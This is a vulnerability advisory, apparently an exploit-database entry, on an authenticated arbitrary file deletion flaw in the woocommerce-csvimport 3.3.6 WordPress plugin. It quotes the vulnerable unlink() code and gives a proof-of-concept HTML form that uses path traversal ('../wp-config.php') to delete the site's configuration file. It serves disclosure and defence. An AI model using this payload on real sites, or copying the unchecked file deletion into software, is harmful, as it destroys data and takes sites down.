woocommerce-csvimport 3.3.6 – Authenticated Arbitrary File Deletion

2017-12-27T00:00:00
ID WPEX-ID:9057
Type wpexploit
Reporter Lenon Leite
Modified 2019-11-01T13:12:51

Description

Type user access: any user registered. $_POST['filename'] is not escaped. Code File: wp-content/plugins/woocommerce-csvimport/export/include/classes/woocsvExport.php Line:64 public function delete_export_file() { if ( isset( $_POST['filename'] ) ) { @unlink( $_POST['filename'] ); } wp_die( 0 ); } Result: wp-config.php file deleted and restart the all system.

                                        
                                            1 – Log in with any user.
2 - Execute form:
<form method="post" action="http://src.wordpress-develop.dev/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>